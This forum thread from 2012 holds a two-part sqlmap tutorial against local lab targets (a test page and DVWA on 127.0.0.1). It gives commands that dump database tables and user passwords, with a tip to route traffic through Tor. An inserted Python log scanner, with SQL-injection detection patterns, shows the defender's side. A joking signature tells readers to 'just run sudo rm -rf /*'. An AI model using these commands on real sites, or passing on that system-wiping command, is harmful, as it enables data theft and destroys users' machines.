SqlMap - SQL Injection with BackBox part 1/2

Started by ZEROF, June 29, 2012, 02:18:12 PM


ZEROF

SqlMap

Sql Injection Tool part 1

OS: BackBox Linux (version 2.05)
Target: 127.0.0.1
Vulnerable Url: 127.0.0.1/SQLInjection/injection.php?id=1

The commands I use in this tutorial are the following (you can add --tor to protect your privacy, or --proxy ip:port):

sqlmap -u some.com/index.php?id=1 --dbs
sqlmap -u some.com/index.php?id=1 -D 'MySQL database name' --tables
sqlmap -u some.com/index.php?id=1 -D 'MySQL database name' -T 'table name' --columns
sqlmap -u some.com/index.php?id=1 -D 'MySQL database name' -T 'table name' -C 'column or columns name' --dump


Video

http://www.youtube.com/watch?v=BDI0t1gBUMA



Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

ZEROF

SqlMap + Live Http Headers Addon

Sql Injection Tool part 2

OS: BackBox Linux (version 2.05)
Extra tool: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
Target: 127.0.0.1
Vulnerable Url: 127.0.0.1/dvwa/

I will use the cookies from the session to run the SQL injection attack. The commands I use in this tutorial are the following (you can add --tor to protect your privacy, or --proxy ip:port):

sqlmap -u 'target url' --cookie='information from HTTP Headers' --string='Surname' --dbs

sqlmap -u 'target url' --cookie='information from HTTP Headers' --string='Surname' -D dvwa --tables

sqlmap -u 'target url' --cookie='information from HTTP Headers' --string='Surname' -D dvwa -T users --columns

sqlmap -u 'target url' --cookie='information from HTTP Headers' --string='Surname' -D dvwa -T users -C password,user --dump


Video

http://youtu.be/4Dg0ODJBZxM

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*
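
Seen from the defender's side, runs like the ones in both parts leave a recognisable trail in the Apache access log whenever the injectable parameter travels in the URL. The following is an added example, not part of the original posts: a small Python scanner over constructed log lines, where the client addresses, timestamp, User-Agent strings and the `scan` helper are assumptions made for the illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Apache "combined" format: ip - - [time] "METHOD uri PROTO" status size "referer" "agent"
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')
# Tokens that have no place in a numeric id parameter (the quote will misfire on free-text fields).
SQLI = re.compile(r"information_schema|union\s+(all\s+)?select|'|--|\b(and|or)\s+\d+\s*=\s*\d+", re.I)

# Constructed sample data; only the request path comes from the tutorial.
UA_BROWSER = "Mozilla/5.0 (X11; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0"
UA_SQLMAP = "sqlmap/1.0-dev (http://sqlmap.org)"

def _line(ip, query, agent):
    return (f'{ip} - - [29/Jun/2012:14:20:01 +0200] '
            f'"GET /SQLInjection/injection.php?{query} HTTP/1.1" 200 512 "-" "{agent}"')

SAMPLE = [
    _line("192.0.2.10", "id=1", UA_BROWSER),
    _line("192.0.2.10", "id=2", UA_BROWSER),
    _line("192.0.2.66", "id=1%27", UA_SQLMAP),
    _line("192.0.2.66", "id=1%20AND%204821%3D4821", UA_SQLMAP),
    _line("192.0.2.66", "id=1%20AND%204821%3D4822", UA_SQLMAP),
    _line("192.0.2.77", "id=1%20OR%20EXISTS(SELECT%201%20FROM%20information_schema.tables)", UA_BROWSER),
]

def scan(lines, burst=3):
    """Return {client_ip: sorted reasons} for clients whose requests look like an injection scan."""
    reasons = defaultdict(set)
    variants = defaultdict(set)            # (ip, path) -> distinct decoded query strings
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue                       # not a combined-format line
        ip, uri, agent = m.groups()
        parts = urlsplit(uri)
        query = unquote_plus(parts.query)  # decode %27, %20, + before matching
        if "sqlmap" in agent.lower():
            reasons[ip].add("sqlmap user-agent")
        if SQLI.search(query):
            reasons[ip].add("sql syntax in query string")
        variants[(ip, parts.path)].add(query)
    # Many variants of one query string only count as corroboration, never on their own.
    for (ip, path), seen in variants.items():
        if len(seen) >= burst and ip in reasons:
            reasons[ip].add(f"{len(seen)} query variants on {path}")
    return {ip: sorted(found) for ip, found in reasons.items()}

if __name__ == "__main__":
    for ip, found in scan(SAMPLE).items():
        print(ip, found)
```

The User-Agent is chosen by the client, so treat it as a hint and rely on the query-string check; parameters sent in a POST body or in a cookie never reach the access log and need inspection at the application or WAF layer.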


V3nD3774

ZEROF,
is the link: 127.0.0.1/SQLInjection/injection.php?id=1 still ON ?

I did try a few times but no luck.

Tx

Not Found

The requested URL /SQLInjection/injection.php was not found on this server.

b4d_bl0ck

Thanks for sharing, ZEROF. Nice vids.. and nice BB desktop aspect.

V3nD3774   :o
Try:
ping 127.0.0.1
If the host is reachable but you cannot access that URI, most probably your ISP is tracking you and blocking your connections, and maybe has already provided your data to a cybercrime investigation agency.
In this case a successful solution could be:
less /etc/hosts
also
sudo ifconfig lo
or if it's not enough try this.
Good luck!
bool secure = check_paranoia() ? true : false;

ZEROF

Quote:
ZEROF,
is the link: 127.0.0.1/SQLInjection/injection.php?id=1 still ON ?

When you need to find the path of a file, use the whereis or find command. Let's say you want to find the injection.php file on your system; you can run this from a terminal:

find / -name injection.php

How to use find command:

Cheers !

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

V3nD3774

Sorry ZEROF,
I might have misunderstood your message (likely because I am a nooob..) but I was not looking for how to find a file on my machine... rather, I was asking whether the link 127.0.0.1/SQLInjection/injection.php?id=1 is still a valid link... this is because when I try to reach this link I just get the following message:

Not Found

The requested URL /SQLInjection/injection.php was not found on this server.
Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80

I will not even comment re b4d_bl0ck's post... it is quite hilarious to say the least (...and maybe has already provided your data to a cybercrime investigation agency)...

Tx again,
~V

b4d_bl0ck

V3nD3774, sorry for my irony, I didn't want to offend you.
I just wanted to encourage you to read before getting hands on things... and I guess you didn't visit the link I provided you.  :)
What I was trying to explain to you is that 127.0.0.1 is nothing more than your PC. If you have no Apache server running on your system listening on port 80, or you have no resource on your server named /SQLInjection/injection.php, you'll never be able to open it. Evidently ZEROF created a vulnerable app by his own hands or downloaded it, and put it in his server, ready to be exploited.
The URL will never be a valid link to you, until you do the same and put in your server a page with the same path and name. That's not an internet resource, but a local one, so it makes no sense asking others if it's a valid link or not...  ;)
Sorry for having joked in the first reply.

Have fun!
bool secure = check_paranoia() ? true : false;
